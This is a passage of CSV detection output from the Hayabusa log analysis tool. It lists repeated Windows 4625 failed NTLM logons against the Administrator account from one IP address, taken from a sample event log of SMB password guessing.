NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:01.813 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9TO1c7eYd1IQHVwG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:01.852 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Wsn5GM4BqEl6A6pY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:01.900 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pq350wqwVDQlTKu9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:01.945 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: uMJWwjG7J2sOiBYd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:01.984 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3YusfxQQygi2x5Cu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:02.024 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6q29uj6ovfwz0riC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:02.072 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: cj38VsqGLoQ8jGdf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:02.120 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TOW8OIO2vQRFaTID : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:02.173 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DfYITdZCYwEj9IJV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:02.205 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4BI6V35tZGZ1WGtJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:02.256 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wOF75n4aunKH9qxc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:02.296 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jsTFTCnFFBkhG5jP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:02.328 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5qiwcKE2TQui2H8z : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:02.380 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PZOCyXplWOCyKbFm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:02.416 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RhyaAhYB78nbh1Ig : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:02.462 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MIJU9xbr1klIvvdE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:02.506 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qLKVR3mW3g3utO4X : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:02.544 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: aNm4tVG8bV7e9gbB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:02.580 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JtU0PCr9K5DXFYV2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:02.622 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CH3BWNPEWlw52Gb6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:02.660 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vQTYqFKBz6YEWhF6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:02.708 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qkj3u8ODgLD7xQ5R : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:02.758 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: r9uyze1uO0zuNNUM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:02.803 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UmL15i3edXHcUamI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:02.840 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: x7xjFRjv9rDhiXJ6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:02.880 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6BmQhVEv8g7EKu1F : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:02.920 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: upOMmG87cDO1NFg0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:02.963 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tO55KfkORhxFORvF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:03.008 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: D64wDbqkqmzWuUSa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:03.056 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sIDgNIlGA0cOkBOI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:03.082 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: i0kXPQ6s7CGe4QGA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:03.156 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HW5jP389jmqSkzF1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:03.186 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: enhsof25BdDPcI2c : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:03.228 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4acsPMLUJRrT7mmL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:03.272 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hi1dzny6hpyr5N3d : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:03.305 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RlPVBSnDMlE0QZaJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:03.348 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: th72TwMoRXtDVWge : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:03.387 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KGTTiJSkErjzoUUC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:03.424 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xyzZwNLltF0cYnai : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:03.464 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gYWVQ6mCqyBfDm3m : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:03.505 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rg2x2lv9JeS5Bb6l : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:03.536 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fU28NKC3WYxFGbMN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:03.580 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EUWDXgnogGDXizWj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:03.629 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IXhAtnNcQKOIsuGS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:03.672 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: cKfrJwI3OGdjL4af : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:03.724 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VdekC160hU7YzrK9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:03.773 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: enOBuzd6jwu8rZCH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:03.812 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: eAjLjDlZSps5D49t : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:03.844 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rY6CONLBVygSTnY5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:03.883 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6FIHgz2yqqbD9zfV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:03.918 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: d82RRXgSmZdnfa8I : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:03.968 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xA3ZWnWc9CoGeKpm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:04.008 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FvSYKi8KvEtnmSbs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:04.056 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IvxXI1u0AwtNHNSU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:04.096 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OFIy6Cps3Rm87Kqf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:04.135 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: slL3aPBnZl3lVJst : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:04.171 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: O98P1oP3AU4lZp2D : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:04.217 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EZZ7wIJNZ0CG7fMs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:04.268 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7RhwHCqXQytvcaom : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:04.309 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xumaxbBEMZqL6pPO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:04.348 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ur1yZIwgB3ecNJGw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:04.397 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xAuGcKYRcLe0z3bl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:04.436 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mmMi0edfBJ8KoJst : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:04.480 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hlnoKbUb9jiqJD7t : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:04.524 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hBeWGNkWTSp3nje8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:04.565 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2iwM6jPgNjZ3q5qb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:04.604 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xdkrA9Kwzero8eSk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:04.652 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Tb2ZvuJMxOfsxIT6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:04.697 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PBMBRPdATYpLNmyI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:04.740 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: P1CKprAPSw4hgiBB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:04.784 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Y8qtzwuGJfQG4XB7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:04.833 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: auOf2GwkoymLh4bC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:04.880 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2YcMYQ4sA2GfMwCS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:04.916 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YL1iM6WUtZIjIoTI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:04.959 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: t7ruxdEGdeP3RLqF : IP Address: 192.168.198.149 : AuthPackage: 